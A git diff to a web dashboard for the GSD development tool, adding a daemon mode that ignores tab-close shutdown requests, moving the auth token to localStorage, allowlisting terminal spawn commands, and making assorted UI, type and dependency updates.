+    test("scheduleShutdown() sets a pending timer", () => {
+      scheduleShutdown();
+      assert.equal(isShutdownPending(), true);
+    });
+
+    test("cancelShutdown() clears the pending timer", () => {
+      scheduleShutdown();
+      cancelShutdown();
+      assert.equal(isShutdownPending(), false);
+    });
+
+    test("isDaemonMode() returns false", () => {
+      assert.equal(isDaemonMode(), false);
+    });
+  });
+
+  describe("daemon mode (GSD_WEB_DAEMON_MODE=1)", () => {
+    beforeEach(() => {
+      process.env.GSD_WEB_DAEMON_MODE = "1";
+    });
+
+    test("isDaemonMode() returns true", () => {
+      assert.equal(isDaemonMode(), true);
+    });
+
+    test("scheduleShutdown() does not schedule a timer", () => {
+      scheduleShutdown();
+      assert.equal(
+        isShutdownPending(),
+        false,
+        "shutdown timer must not be set in daemon mode",
+      );
+    });
+
+    test("scheduleShutdown() is safe to call multiple times", () => {
+      scheduleShutdown();
+      scheduleShutdown();
+      scheduleShutdown();
+      assert.equal(isShutdownPending(), false);
+    });
+  });
+
+  describe("daemon mode is not activated by other values", () => {
+    test("GSD_WEB_DAEMON_MODE=0 does not enable daemon mode", () => {
+      process.env.GSD_WEB_DAEMON_MODE = "0";
+      assert.equal(isDaemonMode(), false);
+      scheduleShutdown();
+      assert.equal(isShutdownPending(), true);
+    });
+
+    test("GSD_WEB_DAEMON_MODE=true does not enable daemon mode", () => {
+      process.env.GSD_WEB_DAEMON_MODE = "true";
+      assert.equal(isDaemonMode(), false);
+      scheduleShutdown();
+      assert.equal(isShutdownPending(), true);
+    });
+
+    test("unset GSD_WEB_DAEMON_MODE does not enable daemon mode", () => {
+      delete process.env.GSD_WEB_DAEMON_MODE;
+      assert.equal(isDaemonMode(), false);
+      scheduleShutdown();
+      assert.equal(isShutdownPending(), true);
+    });
+  });
+});
diff --git a/web/lib/auth.ts b/web/lib/auth.ts
index 47ac0515f..78f8abca5 100644
--- a/web/lib/auth.ts
+++ b/web/lib/auth.ts
@@ -7,22 +7,27 @@
  * keeping the token local to the machine.
  *
  * On first load this module extracts the token from the fragment, persists
- * it to sessionStorage (so it survives page refreshes), and clears the
- * fragment from the address bar. All subsequent API calls attach the token
- * via the `Authorization: Bearer` header.
+ * it to localStorage (so it survives page refreshes and is accessible from
+ * all tabs on the same origin), and clears the fragment from the address bar.
+ * All subsequent API calls attach the token via the `Authorization: Bearer`
+ * header.
+ *
+ * localStorage is shared across all tabs on the same origin. Because each
+ * GSD instance binds to a unique random port, the origin already scopes
+ * the token to that instance — no additional namespacing is needed.
  *
  * For EventSource (SSE), which cannot send custom headers, the token is
  * appended as a `?_token=` query parameter instead.
  */
 
-const SESSION_STORAGE_KEY = "gsd-auth-token"
+const AUTH_STORAGE_KEY = "gsd-auth-token"
 
 let cachedToken: string | null = null
 
 /**
  * Extract the auth token from the URL fragment on first call, then return
- * the cached value. Falls back to sessionStorage so the token survives
- * page refreshes (which clear the in-memory cache and the URL fragment).
+ * the cached value. Falls back to localStorage so the token survives
+ * page refreshes and is available to all tabs on the same origin.
  * Clears the fragment from the address bar after extraction.
  */
 export function getAuthToken(): string | null {
@@ -36,11 +41,10 @@ export function getAuthToken(): string | null {
     const match = hash.match(/token=([a-fA-F0-9]+)/)
     if (match) {
       cachedToken = match[1]
-      // Persist to sessionStorage so the token survives page refreshes.
-      // sessionStorage is scoped to this browser tab — it does not leak
-      // to other tabs or persist after the tab is closed.
+      // Persist to localStorage so the token survives page refreshes and
+      // is available to other tabs on the same origin (same GSD instance).
       try {
-        sessionStorage.setItem(SESSION_STORAGE_KEY, cachedToken)
+        localStorage.setItem(AUTH_STORAGE_KEY, cachedToken)
       } catch {
         // Storage unavailable (e.g. private browsing quota exceeded) — the
         // in-memory cache still works for the current page lifecycle.
@@ -52,9 +56,9 @@ export function getAuthToken(): string | null {
     }
   }
 
-  // 2. Fall back to sessionStorage (page refresh, bookmark without hash)
+  // 2. Fall back to localStorage (page refresh, second tab, bookmark without hash)
   try {
-    const stored = sessionStorage.getItem(SESSION_STORAGE_KEY)
+    const stored = localStorage.getItem(AUTH_STORAGE_KEY)
     if (stored) {
       cachedToken = stored
       return cachedToken
@@ -66,6 +70,19 @@ export function getAuthToken(): string | null {
   return null
 }
 
+/**
+ * Listen for token changes from other tabs via the `storage` event.
+ * When another tab writes a new token to localStorage, this tab picks
+ * it up immediately without requiring a page refresh.
+ */
+if (typeof window !== "undefined") {
+  window.addEventListener("storage", (event) => {
+    if (event.key === AUTH_STORAGE_KEY && event.newValue) {
+      cachedToken = event.newValue
+    }
+  })
+}
+
 /**
  * Returns an object with the `Authorization` header for use with `fetch()`.
  * Merges with any additional headers provided.
@@ -81,10 +98,20 @@ export function authHeaders(extra?: Record<string, string>): Record<string, stri
 
 /**
  * Wrapper around `fetch()` that automatically injects the auth token.
+ *
+ * When no token is available (missing `#token=` fragment and no localStorage
+ * entry), returns a synthetic 401 Response instead of making an unauthenticated
+ * request that will fail server-side anyway. This lets callers handle the
+ * missing-token case uniformly rather than silently cascading 401s.
  */
 export async function authFetch(input: RequestInfo | URL, init?: RequestInit): Promise<Response> {
   const token = getAuthToken()
-  if (!token) return fetch(input, init)
+  if (!token) {
+    return new Response(JSON.stringify({ error: "No auth token available" }), {
+      status: 401,
+      headers: { "Content-Type": "application/json" },
+    })
+  }
 
   const headers = new Headers(init?.headers)
   if (!headers.has("Authorization")) {
diff --git a/web/lib/browser-slash-command-dispatch.ts b/web/lib/browser-slash-command-dispatch.ts
index d8a3f2e4f..0af50a412 100644
--- a/web/lib/browser-slash-command-dispatch.ts
+++ b/web/lib/browser-slash-command-dispatch.ts
@@ -126,6 +126,7 @@ const GSD_SURFACE_SUBCOMMANDS = new Map<string, BrowserSlashCommandSurface>([
   ["history", "gsd-history"],
   ["undo", "gsd-undo"],
   ["inspect", "gsd-inspect"],
+  ["model", "model"],
   ["prefs", "gsd-prefs"],
   ["config", "gsd-config"],
   ["hooks", "gsd-hooks"],
@@ -153,7 +154,7 @@ export const GSD_HELP_TEXT = `Available /gsd subcommands:
 Workflow:    next · auto · stop · pause · skip · queue · quick · capture · triage
 Diagnostics: status · visualize · forensics · doctor · skill-health · inspect
 Context:     knowledge · history · undo · discuss
-Settings:    prefs · config · hooks · mode · steer
+Settings:    model · prefs · config · hooks · mode · steer
 Advanced:    export · cleanup · run-hook · migrate · remote
 
 Type /gsd <subcommand> to run. Use /gsd help for this message.`
diff --git a/web/lib/command-surface-contract.ts b/web/lib/command-surface-contract.ts
index bb0760914..00029418f 100644
--- a/web/lib/command-surface-contract.ts
+++ b/web/lib/command-surface-contract.ts
@@ -40,6 +40,7 @@ export type CommandSurfaceSection =
   | "compact"
   | "workspace"
   | "integrations"
+  | "experimental"
   // GSD subcommand surfaces (S02)
   | "gsd-status"
   | "gsd-visualize"
diff --git a/web/lib/diagnostics-types.ts b/web/lib/diagnostics-types.ts
index 079e25ec1..5e39c612b 100644
--- a/web/lib/diagnostics-types.ts
+++ b/web/lib/diagnostics-types.ts
@@ -13,6 +13,10 @@ export type ForensicAnomalyType =
   | "crash"
   | "doctor-issue"
   | "error-trace"
+  | "journal-stuck"
+  | "journal-guard-block"
+  | "journal-rapid-iterations"
+  | "journal-worktree-failure"
 
 export interface ForensicAnomaly {
   type: ForensicAnomalyType
@@ -56,6 +60,23 @@ export interface ForensicRecentUnit {
   finishedAt: number
 }
 
+export interface ForensicActivityLogMeta {
+  fileCount: number
+  totalSizeBytes: number
+  oldestFile: string | null
+  newestFile: string | null
+}
+
+export interface ForensicJournalSummary {
+  totalEntries: number
+  flowCount: number
+  eventCounts: Record<string, number>
+  recentEvents: { ts: string; flowId: string; eventType: string; rule?: string; unitId?: string }[]
+  oldestEntry: string | null
+  newestEntry: string | null
+  fileCount: number
+}
+
 export interface ForensicReport {
   gsdVersion: string
   timestamp: string
@@ -70,6 +91,8 @@ export interface ForensicReport {
   unitTraces: ForensicUnitTrace[]
   completedKeyCount: number
   metrics: ForensicMetricsSummary | null
+  journalSummary: ForensicJournalSummary | null
+  activityLogMeta: ForensicActivityLogMeta | null
 }
 
 // ─── Doctor ───────────────────────────────────────────────────────────────────
diff --git a/web/lib/gsd-workspace-store.tsx b/web/lib/gsd-workspace-store.tsx
index a912c4217..3465ec91d 100644
--- a/web/lib/gsd-workspace-store.tsx
+++ b/web/lib/gsd-workspace-store.tsx
@@ -66,7 +66,7 @@ import type {
 } from "./session-browser-contract"
 import { authFetch, appendAuthParam } from "./auth"
 
-export type WorkspaceStatus = "idle" | "loading" | "ready" | "error"
+export type WorkspaceStatus = "idle" | "loading" | "ready" | "error" | "unauthenticated"
 export type WorkspaceConnectionState =
   | "idle"
   | "connecting"
@@ -125,37 +125,7 @@ export interface BridgeRuntimeSnapshot {
   lastError: BridgeLastError | null
 }
 
-export interface WorkspaceTaskTarget {
-  id: string
-  title: string
-  done: boolean
-  planPath?: string
-  summaryPath?: string
-}
-
-export type RiskLevel = "low" | "medium" | "high"
-
-export interface WorkspaceSliceTarget {
-  id: string
-  title: string
-  done: boolean
-  planPath?: string
-  summaryPath?: string
-  uatPath?: string
-  tasksDir?: string
-  branch?: string
-  risk?: RiskLevel
-  depends?: string[]
-  demo?: string
-  tasks: WorkspaceTaskTarget[]
-}
-
-export interface WorkspaceMilestoneTarget {
-  id: string
-  title: string
-  roadmapPath?: string
-  slices: WorkspaceSliceTarget[]
-}
+export type { WorkspaceTaskTarget, RiskLevel, WorkspaceSliceTarget, WorkspaceMilestoneTarget } from "./workspace-types.js"
 
 export interface WorkspaceScopeTarget {
   scope: string
@@ -180,6 +150,17 @@ export interface WorkspaceIndex {
   validationIssues: WorkspaceValidationIssue[]
 }
 
+export interface RtkSessionSavings {
+  commands: number
+  inputTokens: number
+  outputTokens: number
+  savedTokens: number
+  savingsPct: number
+  totalTimeMs: number
+  avgTimeMs: number
+  updatedAt: string
+}
+
 export interface AutoDashboardData {
   active: boolean
   paused: boolean
@@ -191,6 +172,9 @@ export interface AutoDashboardData {
   basePath: string
   totalCost: number
   totalTokens: number
+  rtkSavings?: RtkSessionSavings | null
+  /** Whether RTK is enabled via experimental.rtk preference. False when not opted in. */
+  rtkEnabled?: boolean
 }
 
 export interface BootResumableSession {
@@ -300,6 +284,7 @@ export interface ProjectDetectionSignals {
   hasPlanningFolder: boolean
   hasGitRepo: boolean
   hasPackageJson: boolean
+  isMonorepo?: boolean
   fileCount: number
 }
 
@@ -334,6 +319,7 @@ export type LiveStateInvalidationDomain = "auto" | "workspace" | "recovery" | "r
 export type LiveStateInvalidationSource = "bridge_event" | "rpc_command" | "session_manage"
 export type LiveStateInvalidationReason =
   | "agent_end"
+  | "turn_end"
   | "auto_retry_start"
   | "auto_retry_end"
   | "auto_compaction_start"
@@ -455,6 +441,10 @@ export type WorkspaceEvent =
   | TurnEndEvent
   | ({ type: Exclude<string, "bridge_status" | "live_state_invalidation" | "extension_ui_request" | "extension_error" | "message_update" | "tool_execution_start" | "tool_execution_end" | "agent_end" | "turn_end">; [key: string]: unknown } & Record<string, unknown>)
 
+export function isWorkspaceEvent(value: unknown): value is WorkspaceEvent {
+  return value !== null && typeof value === "object" && typeof (value as Record<string, unknown>).type === "string"
+}
+
 export interface WorkspaceCommandResponse {
   type: "response"
   command: string
@@ -4121,6 +4111,13 @@ export class GSDWorkspaceStore {
         })
 
         if (!response.ok) {
+          if (response.status === 401) {
+            this.patchState({
+              bootStatus: "unauthenticated",
+              connectionState: "error",
+            })
+            return
+          }
           throw new Error(`Boot request failed with ${response.status}`)
         }
 
@@ -4844,8 +4841,15 @@ export class GSDWorkspaceStore {
 
     stream.onmessage = (message) => {
       try {
-        const payload = JSON.parse(message.data) as WorkspaceEvent
-        this.handleEvent(payload)
+        const parsed: unknown = JSON.parse(message.data)
+        if (!isWorkspaceEvent(parsed)) {
+          this.patchState({
+            lastClientError: "Malformed event received from stream",
+            terminalLines: withTerminalLine(this.state.terminalLines, createTerminalLine("error", "Malformed event received from stream")),
+          })
+          return
+        }
+        this.handleEvent(parsed)
       } catch (error) {
         const text = normalizeClientError(error)
         this.patchState({
@@ -4923,6 +4927,15 @@ export class GSDWorkspaceStore {
       case "tool_execution_end":
         this.handleToolExecutionEnd(event as ToolExecutionEndEvent)
         break
+      case "bridge_status":
+        // Handled upstream in handleEvent with early return — never reaches here
+        break
+      case "live_state_invalidation":
+        // Handled upstream in handleEvent via handleLiveStateInvalidation — no live interaction state update needed
+        break
+      case "extension_error":
+        // Terminal line produced by summarizeEvent — no live interaction state update needed
+        break
     }
   }
 
@@ -5039,10 +5052,16 @@ export class GSDWorkspaceStore {
       const nextThinking = [...this.state.liveThinkingTranscript, ""]
       const nextSegments = [...this.state.completedTurnSegments, finalSegments]
       const overflow = nextTranscript.length > MAX_TRANSCRIPT_BLOCKS ? nextTranscript.length - MAX_TRANSCRIPT_BLOCKS : 0
+      // When overflow trims the front of parallel arrays, also trim
+      // chatUserMessages to keep index-based interleaving aligned (#2707).
+      const trimmedUserMsgs = overflow > 0
+        ? this.state.chatUserMessages.slice(overflow)
+        : undefined
       this.patchState({
         liveTranscript: overflow > 0 ? nextTranscript.slice(overflow) : nextTranscript,
         liveThinkingTranscript: overflow > 0 ? nextThinking.slice(overflow) : nextThinking,
         completedTurnSegments: overflow > 0 ? nextSegments.slice(overflow) : nextSegments,
+        ...(trimmedUserMsgs !== undefined ? { chatUserMessages: trimmedUserMsgs } : {}),
         streamingAssistantText: "",
         streamingThinkingText: "",
         currentTurnSegments: [],
diff --git a/web/lib/pty-chat-parser.ts b/web/lib/pty-chat-parser.ts
index 30b53e54c..097f538d9 100644
--- a/web/lib/pty-chat-parser.ts
+++ b/web/lib/pty-chat-parser.ts
@@ -115,8 +115,8 @@ export function stripAnsi(s: string): string {
 const PROMPT_MARKERS = [
   /^❯\s*/,     // Pi default primary prompt
   /^›\s*/,     // Pi alternate prompt
-  /^>\s+/,     // Simple > prompt (some themes)
-  /^\$\s+/,    // Shell prompt fallback
+  /^>(\s+|$)/,  // Simple > prompt (some themes) — bare ">" or "> text"
+  /^\$(\s+|$)/, // Shell prompt fallback — bare "$" or "$ text"
 ]
 
 /**
@@ -304,6 +304,15 @@ export class PtyChatParser {
    */
   private _completionEmitted = false
 
+  /**
+   * True when the parser has seen a prompt boundary and is waiting for user
+   * input.  The next non-system, non-prompt, non-TUI content line after the
+   * prompt is classified as role="user" instead of "assistant".
+   * Reset to false once that user line arrives (or when a new assistant
+   * message explicitly starts via a different signal).
+   */
+  private _awaitingInput = false
+
   constructor(source = "default") {
     this._source = source
   }
@@ -329,6 +338,15 @@ export class PtyChatParser {
     return [...this._messages]
   }
 
+  /**
+   * Returns true when the parser has detected a prompt boundary and is
+   * waiting for user input.  Chat UIs can use this to show an "awaiting
+   * input" indicator so the session does not appear stuck.
+   */
+  isAwaitingInput(): boolean {
+    return this._awaitingInput
+  }
+
   /**
    * Flush any trailing partial buffer even if it does not end with a newline.
    * Useful for terminal UIs that leave the final status line unterminated.
@@ -373,6 +391,7 @@ export class PtyChatParser {
     this._lastHeaderText = ""
     this._lastInputAt = 0
     this._completionEmitted = false
+    this._awaitingInput = false
     if (this._completionTimer) {
       clearTimeout(this._completionTimer)
       this._completionTimer = null
@@ -489,6 +508,11 @@ export class PtyChatParser {
       if (userText.length > 0) {
         const msg = this._startMessage("user", userText)
         this._completeMessage(msg) // user lines are typically single-line
+        this._awaitingInput = false
+      } else {
+        // Bare prompt with no inline user text — mark as awaiting input
+        // so the next content line is classified as user input.
+        this._awaitingInput = true
       }
       return
     }
@@ -533,6 +557,21 @@ export class PtyChatParser {
       this._lastHeaderText = trimmed
     }
 
+    // ── Awaiting input → classify as user ──────────────────────────────────
+    // After a bare prompt line (e.g. "❯ \n"), the next content line is
+    // the user's typed input echoed back by the PTY (without prompt prefix).
+    if (this._awaitingInput) {
+      this._awaitingInput = false
+      const msg = this._startMessage("user", trimmed)
+      this._completeMessage(msg)
+      console.debug(
+        "[pty-chat-parser] user input detected (post-prompt echo) id=%s source=%s",
+        msg.id,
+        this._source,
+      )
+      return
+    }
+
     // ── Regular content line → assistant ────────────────────────────────────
     if (
       this._activeMessage === null ||
diff --git a/web/lib/pty-manager.ts b/web/lib/pty-manager.ts
index ddadb3958..dcb21fb03 100644
--- a/web/lib/pty-manager.ts
+++ b/web/lib/pty-manager.ts
@@ -119,6 +119,19 @@ interface TerminalSpawnSpec {
   label: string;
 }
 
+const ALLOWED_TERMINAL_COMMANDS = new Set([
+  "gsd",
+  process.env.SHELL || "/bin/zsh",
+  "/bin/bash",
+  "/bin/zsh",
+  "/bin/sh",
+]);
+
+export function isAllowedTerminalCommand(command?: string): boolean {
+  if (!command) return true;
+  return ALLOWED_TERMINAL_COMMANDS.has(command);
+}
+
 function resolveTerminalSpawnSpec(cwd: string, command?: string, commandArgs: string[] = []): TerminalSpawnSpec {
   if (!command) {
     const shell = getDefaultShell();
@@ -235,6 +248,9 @@ function loadNodePty(): LoadedNodePty {
 
 export function getOrCreateSession(sessionId: string, projectCwd?: string, command?: string, commandArgs: string[] = []): PtySession {
   ensureProcessCleanupHandlers();
+  if (!isAllowedTerminalCommand(command)) {
+    throw new Error(`Command not allowed: ${command}`);
+  }
   const map = getSessions();
   const existing = map.get(sessionId);
   if (existing?.alive) return existing;
diff --git a/web/lib/settings-types.ts b/web/lib/settings-types.ts
index db962e00d..7d06c31d0 100644
--- a/web/lib/settings-types.ts
+++ b/web/lib/settings-types.ts
@@ -87,6 +87,7 @@ export interface SettingsProjectTotals {
 
 export interface SettingsPreferencesData {
   mode?: SettingsWorkflowMode
+  models?: Record<string, string>
   budgetCeiling?: number
   budgetEnforcement?: SettingsBudgetEnforcement
   tokenProfile?: SettingsTokenProfile
@@ -107,6 +108,9 @@ export interface SettingsPreferencesData {
     timeoutMinutes?: number
     pollIntervalSeconds?: number
   }
+  experimental?: {
+    rtk?: boolean
+  }
   scope: "global" | "project"
   path: string
   warnings?: string[]
diff --git a/web/lib/shutdown-gate.ts b/web/lib/shutdown-gate.ts
index a8d3ec824..9d1b5397d 100644
--- a/web/lib/shutdown-gate.ts
+++ b/web/lib/shutdown-gate.ts
@@ -6,18 +6,39 @@
  *   pagehide → POST /api/shutdown → scheduleShutdown() → timer starts
  *   refresh  → GET  /api/boot     → cancelShutdown()   → timer cleared
  *   tab close → timer fires → process.exit(0)
+ *
+ * When GSD_WEB_DAEMON_MODE=1, the server is running as a persistent daemon
+ * (e.g. behind a reverse proxy for remote access). In this mode,
+ * scheduleShutdown() is a no-op — no client tab should be able to exit the
+ * server. The /api/shutdown endpoint still returns { ok: true } so the
+ * client beacon doesn't produce a network error.
  */
 
 const SHUTDOWN_DELAY_MS = 3_000;
 
 let shutdownTimer: ReturnType<typeof setTimeout> | null = null;
 
+/**
+ * Returns true when the server is running in daemon mode.
+ * In daemon mode, shutdown requests from browser tabs are ignored.
+ */
+export function isDaemonMode(): boolean {
+  return process.env.GSD_WEB_DAEMON_MODE === "1";
+}
+
 /**
  * Schedule a graceful process exit after SHUTDOWN_DELAY_MS.
  * If cancelShutdown() is called before the timer fires (e.g. a page refresh
  * triggers a boot request), the exit is aborted.
+ *
+ * No-op when GSD_WEB_DAEMON_MODE=1 — the server should outlive any
+ * individual browser session.
  */
 export function scheduleShutdown(): void {
+  if (isDaemonMode()) {
+    return;
+  }
+
   // Don't stack timers — reset if already scheduled
   if (shutdownTimer !== null) {
     clearTimeout(shutdownTimer);
diff --git a/web/lib/workflow-actions.ts b/web/lib/workflow-actions.ts
index 867803086..a4c7e3f5b 100644
--- a/web/lib/workflow-actions.ts
+++ b/web/lib/workflow-actions.ts
@@ -79,6 +79,20 @@ export function deriveWorkflowAction(input: WorkflowActionInput): WorkflowAction
       primary = { label: "Start Auto", command: "/gsd auto", variant: "default" }
     } else if (phase === "pre-planning" && !hasMilestones) {
       primary = { label: "Initialize Project", command: "/gsd", variant: "default" }
+    } else if (phase === "blocked") {
+      primary = { label: "Blocked", command: "/gsd", variant: "default" }
+      disabled = true
+      disabledReason = "Project is blocked — check blockers"
+    } else if (phase === "paused") {
+      primary = { label: "Resume", command: "/gsd auto", variant: "default" }
+    } else if (phase === "validating-milestone") {
+      primary = { label: "Validate", command: "/gsd", variant: "default" }
+    } else if (phase === "completing-milestone") {
+      primary = { label: "Complete Milestone", command: "/gsd", variant: "default" }
+    } else if (phase === "needs-discussion") {
+      primary = { label: "Discuss", command: "/gsd", variant: "default" }
+    } else if (phase === "replanning-slice") {
+      primary = { label: "Replan", command: "/gsd", variant: "default" }
     } else {
       primary = { label: "Continue", command: "/gsd", variant: "default" }
     }
diff --git a/web/lib/workspace-status.ts b/web/lib/workspace-status.ts
index 7fffa498c..7578b0042 100644
--- a/web/lib/workspace-status.ts
+++ b/web/lib/workspace-status.ts
@@ -2,7 +2,7 @@ import type {
   WorkspaceMilestoneTarget,
   WorkspaceSliceTarget,
   WorkspaceTaskTarget,
-} from "./gsd-workspace-store"
+} from "./workspace-types.js"
 
 export type ItemStatus = "done" | "in-progress" | "pending"
 
@@ -10,13 +10,27 @@ export function getMilestoneStatus(
   milestone: WorkspaceMilestoneTarget,
   active: { milestoneId?: string },
 ): ItemStatus {
-  if (milestone.slices.length > 0 && milestone.slices.every((slice) => slice.done)) {
+  // Prefer authoritative milestone status from GSD state registry (#2807)
+  if (milestone.status) {
+    switch (milestone.status) {
+      case "complete":
+        return "done"
+      case "active":
+        return "in-progress"
+      case "pending":
+      case "parked":
+        return "pending"
+    }
+  }
+
+  // Fallback: infer from slice completion (legacy / no status field)
+  if (milestone.slices.length > 0 && milestone.slices.every((slice: WorkspaceSliceTarget) => slice.done)) {
     return "done"
   }
   if (active.milestoneId === milestone.id) {
     return "in-progress"
   }
-  return milestone.slices.some((slice) => slice.done) ? "in-progress" : "pending"
+  return milestone.slices.some((slice: WorkspaceSliceTarget) => slice.done) ? "in-progress" : "pending"
 }
 
 export function getSliceStatus(
diff --git a/web/lib/workspace-types.ts b/web/lib/workspace-types.ts
new file mode 100644
index 000000000..5cfa99450
--- /dev/null
+++ b/web/lib/workspace-types.ts
@@ -0,0 +1,35 @@
+export interface WorkspaceTaskTarget {
+  id: string
+  title: string
+  done: boolean
+  planPath?: string
+  summaryPath?: string
+}
+
+export type RiskLevel = "low" | "medium" | "high"
+
+export interface WorkspaceSliceTarget {
+  id: string
+  title: string
+  done: boolean
+  planPath?: string
+  summaryPath?: string
+  uatPath?: string
+  tasksDir?: string
+  branch?: string
+  risk?: RiskLevel
+  depends?: string[]
+  demo?: string
+  tasks: WorkspaceTaskTarget[]
+}
+
+export interface WorkspaceMilestoneTarget {
+  id: string
+  title: string
+  roadmapPath?: string
+  /** Authoritative milestone lifecycle status from the GSD state registry. */
+  status?: "complete" | "active" | "pending" | "parked"
+  /** Milestone validation verdict, when validation has been performed. */
+  validationVerdict?: "pass" | "needs-attention" | "needs-remediation"
+  slices: WorkspaceSliceTarget[]
+}
diff --git a/web/lib/xterm-theme.ts b/web/lib/xterm-theme.ts
new file mode 100644
index 000000000..afaa1ef39
--- /dev/null
+++ b/web/lib/xterm-theme.ts
@@ -0,0 +1,70 @@
+const XTERM_DARK_THEME = {
+  background: "#0a0a0a",
+  foreground: "#e4e4e7",
+  cursor: "#e4e4e7",
+  cursorAccent: "#0a0a0a",
+  selectionBackground: "#27272a",
+  selectionForeground: "#e4e4e7",
+  black: "#18181b",
+  red: "#ef4444",
+  green: "#22c55e",
+  yellow: "#eab308",
+  blue: "#3b82f6",
+  magenta: "#a855f7",
+  cyan: "#06b6d4",
+  white: "#e4e4e7",
+  brightBlack: "#52525b",
+  brightRed: "#f87171",
+  brightGreen: "#4ade80",
+  brightYellow: "#facc15",
+  brightBlue: "#60a5fa",
+  brightMagenta: "#c084fc",
+  brightCyan: "#22d3ee",
+  brightWhite: "#fafafa",
+} as const;
+
+const XTERM_LIGHT_THEME = {
+  background: "#f5f5f5",
+  foreground: "#18181b",
+  cursor: "#18181b",
+  cursorAccent: "#f5f5f5",
+  selectionBackground: "#d4d4d8",
+  selectionForeground: "#18181b",
+  black: "#18181b",
+  red: "#b91c1c",
+  green: "#166534",
+  yellow: "#854d0e",
+  blue: "#1d4ed8",
+  magenta: "#7e22ce",
+  cyan: "#0f766e",
+  // Keep ANSI white entries readable on a light terminal surface.
+  white: "#52525b",
+  brightBlack: "#71717a",
+  brightRed: "#dc2626",
+  brightGreen: "#15803d",
+  brightYellow: "#713f12",
+  brightBlue: "#2563eb",
+  brightMagenta: "#9333ea",
+  brightCyan: "#0f766e",
+  brightWhite: "#27272a",
+} as const;
+
+export function getXtermTheme(isDark: boolean) {
+  return isDark ? XTERM_DARK_THEME : XTERM_LIGHT_THEME;
+}
+
+export function getXtermOptions(isDark: boolean, fontSize?: number) {
+  return {
+    cursorBlink: true,
+    cursorStyle: "bar" as const,
+    fontSize: fontSize ?? 13,
+    fontFamily:
+      "'SF Mono', 'Cascadia Code', 'Fira Code', Menlo, Monaco, 'Courier New', monospace",
+    lineHeight: 1.35,
+    letterSpacing: 0,
+    theme: getXtermTheme(isDark),
+    allowProposedApi: true,
+    scrollback: 10000,
+    convertEol: false,
+  };
+}
diff --git a/web/package-lock.json b/web/package-lock.json
index fd7c24a3c..8fb9c84a1 100644
--- a/web/package-lock.json
+++ b/web/package-lock.json
@@ -52,7 +52,7 @@
         "input-otp": "1.4.2",
         "lucide-react": "^0.564.0",
         "motion": "^12.36.0",
-        "next": "16.1.6",
+        "next": "16.2.3",
         "next-themes": "^0.4.6",
         "node-pty": "^1.1.0",
         "react": "19.2.4",
@@ -77,7 +77,7 @@
         "@types/react-dom": "19.2.3",
         "esbuild": "^0.27.4",
         "eslint": "^9.38.0",
-        "eslint-config-next": "16.1.6",
+        "eslint-config-next": "16.2.3",
         "postcss": "^8.5",
         "tailwindcss": "^4.2.0",
         "tw-animate-css": "1.3.3",
@@ -2181,15 +2181,15 @@
       }
     },
     "node_modules/@next/env": {
-      "version": "16.1.6",
-      "resolved": "https://registry.npmjs.org/@next/env/-/env-16.1.6.tgz",
-      "integrity": "sha512-N1ySLuZjnAtN3kFnwhAwPvZah8RJxKasD7x1f8shFqhncnWZn4JMfg37diLNuoHsLAlrDfM3g4mawVdtAG8XLQ==",
+      "version": "16.2.3",
+      "resolved": "https://registry.npmjs.org/@next/env/-/env-16.2.3.tgz",
+      "integrity": "sha512-ZWXyj4uNu4GCWQw9cjRxWlbD+33mcDszIo9iQxFnBX3Wmgq9ulaSJcl6VhuWx5pCWqqD+9W6Wfz7N0lM5lYPMA==",
       "license": "MIT"
     },
     "node_modules/@next/eslint-plugin-next": {
-      "version": "16.1.6",
-      "resolved": "https://registry.npmjs.org/@next/eslint-plugin-next/-/eslint-plugin-next-16.1.6.tgz",
-      "integrity": "sha512-/Qq3PTagA6+nYVfryAtQ7/9FEr/6YVyvOtl6rZnGsbReGLf0jZU6gkpr1FuChAQpvV46a78p4cmHOVP8mbfSMQ==",
+      "version": "16.2.3",
+      "resolved": "https://registry.npmjs.org/@next/eslint-plugin-next/-/eslint-plugin-next-16.2.3.tgz",
+      "integrity": "sha512-nE/b9mht28XJxjTwKs/yk7w4XTaU3t40UHVAky6cjiijdP/SEy3hGsnQMPxmXPTpC7W4/97okm6fngKnvCqVaA==",
       "dev": true,
       "license": "MIT",
       "dependencies": {
@@ -2197,9 +2197,9 @@
       }
     },
     "node_modules/@next/swc-darwin-arm64": {
-      "version": "16.1.6",
-      "resolved": "https://registry.npmjs.org/@next/swc-darwin-arm64/-/swc-darwin-arm64-16.1.6.tgz",
-      "integrity": "sha512-wTzYulosJr/6nFnqGW7FrG3jfUUlEf8UjGA0/pyypJl42ExdVgC6xJgcXQ+V8QFn6niSG2Pb8+MIG1mZr2vczw==",
+      "version": "16.2.3",
+      "resolved": "https://registry.npmjs.org/@next/swc-darwin-arm64/-/swc-darwin-arm64-16.2.3.tgz",
+      "integrity": "sha512-u37KDKTKQ+OQLvY+z7SNXixwo4Q2/IAJFDzU1fYe66IbCE51aDSAzkNDkWmLN0yjTUh4BKBd+hb69jYn6qqqSg==",
       "cpu": [
         "arm64"
       ],
@@ -2213,9 +2213,9 @@
       }
     },
     "node_modules/@next/swc-darwin-x64": {
-      "version": "16.1.6",
-      "resolved": "https://registry.npmjs.org/@next/swc-darwin-x64/-/swc-darwin-x64-16.1.6.tgz",
-      "integrity": "sha512-BLFPYPDO+MNJsiDWbeVzqvYd4NyuRrEYVB5k2N3JfWncuHAy2IVwMAOlVQDFjj+krkWzhY2apvmekMkfQR0CUQ==",
+      "version": "16.2.3",
+      "resolved": "https://registry.npmjs.org/@next/swc-darwin-x64/-/swc-darwin-x64-16.2.3.tgz",
+      "integrity": "sha512-gHjL/qy6Q6CG3176FWbAKyKh9IfntKZTB3RY/YOJdDFpHGsUDXVH38U4mMNpHVGXmeYW4wj22dMp1lTfmu/bTQ==",
       "cpu": [
         "x64"
       ],
@@ -2229,12 +2229,15 @@
       }
     },
     "node_modules/@next/swc-linux-arm64-gnu": {
-      "version": "16.1.6",
-      "resolved": "https://registry.npmjs.org/@next/swc-linux-arm64-gnu/-/swc-linux-arm64-gnu-16.1.6.tgz",
-      "integrity": "sha512-OJYkCd5pj/QloBvoEcJ2XiMnlJkRv9idWA/j0ugSuA34gMT6f5b7vOiCQHVRpvStoZUknhl6/UxOXL4OwtdaBw==",
+      "version": "16.2.3",
+      "resolved": "https://registry.npmjs.org/@next/swc-linux-arm64-gnu/-/swc-linux-arm64-gnu-16.2.3.tgz",
+      "integrity": "sha512-U6vtblPtU/P14Y/b/n9ZY0GOxbbIhTFuaFR7F4/uMBidCi2nSdaOFhA0Go81L61Zd6527+yvuX44T4ksnf8T+Q==",
       "cpu": [
         "arm64"
       ],
+      "libc": [
+        "glibc"
+      ],
